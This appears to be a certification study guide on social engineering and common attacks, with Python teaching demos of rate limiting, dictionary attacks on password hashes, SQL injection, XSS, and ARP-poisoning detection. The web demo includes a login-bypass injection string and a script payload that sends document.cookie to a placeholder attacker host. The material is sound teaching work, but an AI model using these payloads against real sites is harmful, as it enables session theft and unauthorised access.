SEC-5: Social Engineering and Attacks

Status: not started

Domain:

  • 2.0 Security

Objective alignment:

  • 2.5 Social engineering and attacks

What You Need To Know

This objective is scenario-heavy. The exam describes an attack and expects you to identify the type or best prevention.

Think in categories:

  • Human manipulation
  • Availability attacks
  • Spoofing/on-path attacks
  • Password attacks
  • Web app attacks
  • Insider/supply chain risks
  • Vulnerable systems

Memory Trick

Use PHISH-DOS-PASS-WEB-SUPPLY:

  • PHISH: phishing, vishing, smishing, QR phishing, spear phishing, whaling
  • DOS: DoS and DDoS
  • PASS: brute force, dictionary, plaintext passwords
  • WEB: SQL injection and XSS
  • SUPPLY: service provider, hardware, software supply chain

Physical/social trick:

  • Tailgating = no consent
  • Piggybacking = with consent

Phishing Variants

Phishing:

  • Fraud messages that trick users into clicking, logging in, paying, or sharing data.
  • Often uses spoofed email, fake sites, urgency, or suspicious links.

Vishing:

  • Voice phishing by phone or voicemail.

Smishing:

  • SMS/text phishing.

QR code phishing:

  • Malicious QR code points to a fake or harmful site.

Spear phishing:

  • Targeted phishing aimed at a specific person or group.

Whaling:

  • Spear phishing aimed at executives or high-value targets.

Business Email Compromise (BEC):

  • Attacker uses email trust to request money, gift cards, payroll changes, or wire transfers.
  • Prevention: verify requests through a separate trusted channel.

Physical/Social Attacks

Shoulder surfing:

  • Watching someone enter or view sensitive information.
  • Prevention: privacy screens, awareness, monitor placement.

Tailgating:

  • An unauthorized person follows someone through a secure door without that person's knowledge or consent.

Piggybacking:

  • Authorized person knowingly lets someone follow them in.

Impersonation:

  • Pretending to be someone trusted, such as help desk, vendor, executive, or employee.

Dumpster diving:

  • Searching trash for information useful in later attacks.
  • Prevention: shredding, secure disposal, clean desk policy.

Availability Attacks

DoS:

  • Denial of Service.
  • One system/attack source makes a service unavailable.

DDoS:

  • Distributed Denial of Service.
  • Many systems, often botnets, attack at once.

Prevention/mitigation:

  • ISP filtering
  • Cloud DDoS protection
  • Firewall/rate-limit patterns
  • Redundancy
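
Added example, not part of the original notes, showing why the firewall/rate-limit pattern above blunts a single-source DoS but does little against a DDoS. It is a Python simulation over constructed traffic; the sliding-window limiter, the threshold of 10 requests per second, and the addresses 203.0.113.7 and 198.51.100.x (documentation ranges) are assumptions for the demo.

```python
from collections import defaultdict, deque


class PerSourceRateLimiter:
    """Sliding-window limit: at most `max_requests` per source IP in any `window` seconds.

    This is the same idea as a firewall or reverse-proxy connection-rate rule.
    """

    def __init__(self, max_requests, window):
        self.max_requests = max_requests
        self.window = window
        self.history = defaultdict(deque)  # source_ip -> timestamps of recent requests

    def allow(self, source_ip, now):
        recent = self.history[source_ip]
        # Drop timestamps that have aged out of the window.
        while recent and now - recent[0] >= self.window:
            recent.popleft()
        if len(recent) >= self.max_requests:
            return False
        recent.append(now)
        return True


def run_traffic(requests, max_requests=10, window=1.0):
    """Feed (timestamp, source_ip) pairs through the limiter; return (allowed, blocked)."""
    limiter = PerSourceRateLimiter(max_requests, window)
    allowed = blocked = 0
    for t, ip in requests:
        if limiter.allow(ip, t):
            allowed += 1
        else:
            blocked += 1
    return allowed, blocked


def normal_client():
    # Constructed legitimate user: five requests spaced 0.2 s apart.
    return [(i * 0.2, "192.0.2.10") for i in range(5)]


def single_source_flood(n=200):
    # Constructed DoS: one attacker address sends n requests in under a second.
    return [(i * 0.004, "203.0.113.7") for i in range(n)]


def distributed_flood(n=200):
    # Constructed DDoS: n bot addresses each send one request in the same second.
    return [(i * 0.004, f"198.51.100.{i % 250 + 1}") for i in range(n)]


if __name__ == "__main__":
    print("normal client     (allowed, blocked):", run_traffic(normal_client()))
    print("single-source DoS (allowed, blocked):", run_traffic(single_source_flood()))
    print("distributed DDoS  (allowed, blocked):", run_traffic(distributed_flood()))
```

The single attacker is cut off after ten requests, but two hundred bots sending one request each all get through, which is why DDoS mitigation relies on ISP filtering, cloud scrubbing, and capacity (redundancy) rather than a per-source rule alone.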

Spoofing and On-Path Attacks

On-path attack:

  • Attacker intercepts/redirects traffic between victim and destination.
  • Formerly called man-in-the-middle.

ARP poisoning:

  • Local network attack: the attacker sends forged ARP replies so victims record the attacker's MAC address for another host's IP, usually the default gateway, and send their traffic through the attacker.

Evil twin:

  • Fake Wi-Fi access point that looks legitimate.
  • Prevention: VPN, HTTPS, avoid unknown Wi-Fi, verify SSID, use enterprise authentication.

On-path browser attack:

  • Malware inside the browser (also called man-in-the-browser) proxies or manipulates traffic from the victim's own machine, after TLS has been decrypted, so HTTPS alone does not stop it.

Zero-Day Attacks

Zero-day:

  • Exploit for a vulnerability not yet known or patched by the vendor.

Exam clue:

  • No patch exists yet, or the vulnerability was unknown before exploitation.

Mitigation:

  • Defense in depth, least privilege, behavior detection, segmentation, rapid patching when fixes arrive.

Password Attacks

Plaintext password storage:

  • Passwords stored as-is, neither hashed nor encrypted; anyone who reads the database gets every password directly.
  • Bad design.

Hashing:

  • One-way representation of a password; the hash is stored and the original password cannot be recovered from it.
  • Used for password storage; should be salted and use a deliberately slow algorithm (bcrypt, scrypt, Argon2, PBKDF2) so each guess costs the attacker time.

Brute force:

  • Try every possible password combination.

Dictionary attack:

  • Try likely words/password lists and substitutions.

Mitigation:

  • Long passwords
  • MFA
  • Account lockout/rate limiting
  • Salted, slow password hashing
  • Password managers
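
Added example, not code from the original notes, tying the three storage designs to the two password attacks above. It stores one constructed password ("Summer2024") as plaintext, as an unsalted SHA-256 hash, and as a salted PBKDF2 hash, then runs the same small dictionary attack with rule-based substitutions against both hashes. The six-word wordlist, the mangling rules, and the iteration count are assumptions for the demo.

```python
import hashlib
import hmac
import os
import time
from typing import Optional, Tuple

# Constructed sample password; values like this appear in real wordlists (assumption).
PASSWORD = "Summer2024"


def store_plaintext(pw: str) -> str:
    """Plaintext storage: whoever reads the database has the password."""
    return pw


def store_fast_hash(pw: str) -> str:
    """Unsalted SHA-256: one-way, but fast, and equal passwords give equal hashes."""
    return hashlib.sha256(pw.encode()).hexdigest()


def store_slow_salted(pw: str, salt: Optional[bytes] = None, iterations: int = 100_000) -> str:
    """Salted PBKDF2-HMAC-SHA256: a random per-user salt plus a deliberately slow derivation."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_slow_salted(pw: str, stored: str) -> bool:
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


# Constructed six-word list standing in for a real leaked-password wordlist.
WORDLIST = ["password", "letmein", "summer", "Summer2023", "Summer2024", "Winter2024"]


def mangle(word: str):
    """Simple substitution rules, the kind cracking tools apply to every wordlist entry."""
    yield word
    yield word.capitalize()
    yield word + "!"
    yield word.replace("a", "@").replace("e", "3")


def dictionary_attack(check) -> Tuple[Optional[str], int]:
    """Run the wordlist through `check(candidate) -> bool`; return (password, guesses made)."""
    guesses = 0
    for word in WORDLIST:
        for cand in mangle(word):
            guesses += 1
            if check(cand):
                return cand, guesses
    return None, guesses


def crack_fast_hash(target: str) -> Tuple[Optional[str], int]:
    return dictionary_attack(lambda c: hashlib.sha256(c.encode()).hexdigest() == target)


def crack_slow_salted(stored: str) -> Tuple[Optional[str], int]:
    return dictionary_attack(lambda c: verify_slow_salted(c, stored))


def seconds_per_guess(stored: str, samples: int = 5) -> float:
    """Cost of one guess against the slow hash; plain SHA-256 runs at millions per second."""
    start = time.perf_counter()
    for _ in range(samples):
        verify_slow_salted("not-the-password", stored)
    return (time.perf_counter() - start) / samples


if __name__ == "__main__":
    fast = store_fast_hash(PASSWORD)
    slow = store_slow_salted(PASSWORD)
    print("plaintext store   :", store_plaintext(PASSWORD))
    print("fast hash cracked :", crack_fast_hash(fast))
    print("slow hash cracked :", crack_slow_salted(slow))
    print("seconds per guess :", round(seconds_per_guess(slow), 4))
```

Both hashes fall on the seventeenth guess: salting and a slow algorithm raise the cost of every guess (and stop one precomputed table from covering every user), but they cannot save a password that is in the wordlist. That is the reason the mitigation list pairs strong hashing with long passwords, lockout, and MFA.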

Web App Attacks

SQL injection:

  • Attacker modifies database queries through unsafe input: user-supplied text is concatenated into the SQL, so quotes and operators in the input become part of the query.
  • Example effect: view, change, or delete database data, or log in without a valid password.
  • Prevention: parameterized queries (the primary control), input validation, secure coding.

XSS:

  • Cross-site scripting.
  • Attacker injects scripts into trusted web pages or links; the victim's browser runs them because they arrive from a site it trusts.
  • Can steal cookies/session tokens or act as the user.
  • Prevention: output encoding of untrusted data, input validation, secure coding, browser updates.

Memory trick:

  • SQL injection attacks the database.
  • XSS attacks the user's browser trust.
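
Added example, not code from the original notes, showing both web app attacks above in working code: a login query built by string formatting next to its parameterized form, and a search page that reflects input raw next to one that output-encodes it. The in-memory SQLite table, the two accounts, and the attacker inputs are constructed for the demo; attacker.example is a placeholder host.

```python
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table. Passwords are kept in plaintext here only to keep
    the injection demo short; the Password Attacks section explains why that is wrong."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> List[Tuple[str, str]]:
    """Query text is built by string formatting, so quotes in user input change the SQL."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username: str, password: str) -> List[Tuple[str, str]]:
    """Placeholders send the values separately from the SQL, so they can only ever be data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def render_vulnerable(search_term: str) -> str:
    """Reflects the term straight into HTML: a <script> in the input runs in the viewer's browser."""
    return f"<p>Results for: {search_term}</p>"


def render_encoded(search_term: str) -> str:
    """Output encoding turns <, >, & and quotes into entities, so the browser shows text, not markup."""
    return f"<p>Results for: {html.escape(search_term, quote=True)}</p>"


# Constructed attacker inputs.
SQLI_PASSWORD = "' OR '1'='1"
XSS_TERM = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login   :", login_vulnerable(db, "nobody", SQLI_PASSWORD))
    print("parameterized login:", login_parameterized(db, "nobody", SQLI_PASSWORD))
    print("vulnerable render  :", render_vulnerable(XSS_TERM))
    print("encoded render     :", render_encoded(XSS_TERM))
```

With the password `' OR '1'='1` the vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so it returns both accounts; the parameterized version returns nothing because the whole string is compared as a password. The encoded render contains `&lt;script&gt;` rather than a tag, so nothing executes.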

Insider and Supply Chain

Insider threat:

  • Employee, contractor, or trusted person misuses access.
  • May be malicious or careless.

Supply chain attack:

  • Attacker compromises a vendor, provider, update, hardware, or software source.
  • Trusted relationship becomes the attack path.

Service provider risk:

  • Third-party providers may have access to internal systems.

Mitigation:

  • Vendor audits
  • Least privilege
  • Contract security requirements
  • Monitor provider access
  • Verify software signatures

Vulnerable Systems

Non-compliant systems:

  • Do not meet organization standards.

Unpatched systems:

  • Missing security updates.

Unprotected systems:

  • Security controls disabled or absent.

EOL/EOSL:

  • End of life/end of service life.
  • No normal security patches or support.

BYOD:

  • Bring Your Own Device.
  • User-owned device accessing company data.
  • Needs policy, MDM, data separation, and security requirements.

Commands To Enter

Windows:

arp -a

What it does:

  • Shows ARP cache entries (the IP-to-MAC mappings this host has learned).
  • Useful for ARP poisoning discussions: two IP addresses sharing one MAC, especially when one of them is the default gateway, is the classic sign.

netstat -ano

What it does:

  • Shows active network connections and listening ports, with the owning process ID (the -o flag).

ipconfig /all

What it does:

  • Shows IP, DNS, gateway, and adapter information.

whoami /groups

What it does:

  • Shows group membership and helps discuss insider/privilege risk.

Linux:

ip neigh

What it does:

  • Shows neighbor/ARP table entries.

ss -tulpn

What it does:

  • Shows TCP and UDP listening sockets; the owning process is shown only for sockets you own or when run as root.

ip route

What it does:

  • Shows routes, including the default gateway.
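
Added example, not part of the original notes, that automates the ARP poisoning check the command list describes: it parses either `arp -a` (Windows) or `ip neigh` (Linux) output and reports any MAC address that answers for more than one IP, rating it HIGH when the default gateway is one of them. The two outputs below are constructed samples, not real captures, and the gateway address 192.168.1.1 is an assumption.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

MAC_RE = re.compile(r"\b(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample output. Note that 192.168.1.1 (the gateway) and 192.168.1.25
# resolve to the same MAC address.
WINDOWS_ARP_A = """\
Interface: 192.168.1.10 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-01     dynamic
  192.168.1.25          aa-bb-cc-dd-ee-01     dynamic
  192.168.1.40          00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

LINUX_IP_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.1.25 dev eth0 lladdr aa:bb:cc:dd:ee:01 STALE
192.168.1.40 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
"""


def normalize_mac(mac: str) -> str:
    """Windows prints aa-bb-cc-..., Linux aa:bb:cc:...; compare them in one form."""
    return mac.lower().replace("-", ":")


def parse_neighbors(text: str) -> Dict[str, str]:
    """Return {ip: mac} from either `arp -a` or `ip neigh` output.
    Broadcast and multicast entries are skipped: they never identify a host."""
    entries: Dict[str, str] = {}
    for line in text.splitlines():
        mac_m = MAC_RE.search(line)
        ip_m = IPV4_RE.search(line)
        if not mac_m or not ip_m:
            continue  # header lines, the Windows "Interface:" line, blank lines
        mac = normalize_mac(mac_m.group(0))
        if mac == "ff:ff:ff:ff:ff:ff" or int(mac[:2], 16) & 1:
            continue  # broadcast, or multicast (low bit of first octet set)
        entries[ip_m.group(0)] = mac
    return entries


def find_shared_macs(entries: Dict[str, str], gateway: str) -> List[Tuple[str, str, List[str]]]:
    """Flag any MAC that answers for more than one IP. Severity is HIGH when the gateway is
    among them, which is the pattern an attacker creates by poisoning the gateway entry."""
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    findings = []
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            severity = "HIGH" if gateway in ips else "INFO"
            findings.append((severity, mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    for label, text in (("Windows arp -a", WINDOWS_ARP_A), ("Linux ip neigh", LINUX_IP_NEIGH)):
        table = parse_neighbors(text)
        for severity, mac, ips in find_shared_macs(table, gateway="192.168.1.1"):
            print(f"{label}: {severity} {mac} answers for {', '.join(ips)}")
```

A shared MAC is an indicator, not proof: router redundancy protocols (VRRP/HSRP), NIC teaming, and a hypervisor or proxy-ARP host answering for several addresses produce the same pattern legitimately. Treat a HIGH finding as a prompt to compare the gateway's MAC against the known value and, on managed switches, to enable Dynamic ARP Inspection.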

Mini Lab

Goal:

  • Practice identifying attack types safely.

Windows:

  1. Run arp -a.
  2. Run netstat -ano.
  3. Run ipconfig /all.
  4. Record:
    • Default gateway:
    • One ARP entry:
    • One active/listening connection:

Linux:

  1. Run ip neigh.
  2. Run ss -tulpn.
  3. Run ip route.
  4. Record:
    • Default gateway:
    • One neighbor entry:
    • One listening service:

Scenario practice:

  1. A CFO gets an email asking for a wire transfer.
  2. A user scans a QR code on a parking meter and lands on a fake payment site.
  3. A fake Wi-Fi network copies the hotel SSID.
  4. An attacker tries every possible password.
  5. A vendor software update is compromised.
  6. A website search box runs attacker-supplied JavaScript.
  7. A database query is manipulated through form input.

For each:

  • Name the attack.
  • Name one prevention or mitigation.

Quick Check Before Quiz

You are ready for the SEC-5 quiz when you can answer these without looking:

  • What is the difference between phishing, vishing, smishing, spear phishing, and whaling?
  • What is the difference between tailgating and piggybacking?
  • What does an evil twin imitate?
  • What is the difference between SQL injection and XSS?
  • What is a supply chain attack?
  • What is the difference between DoS and DDoS?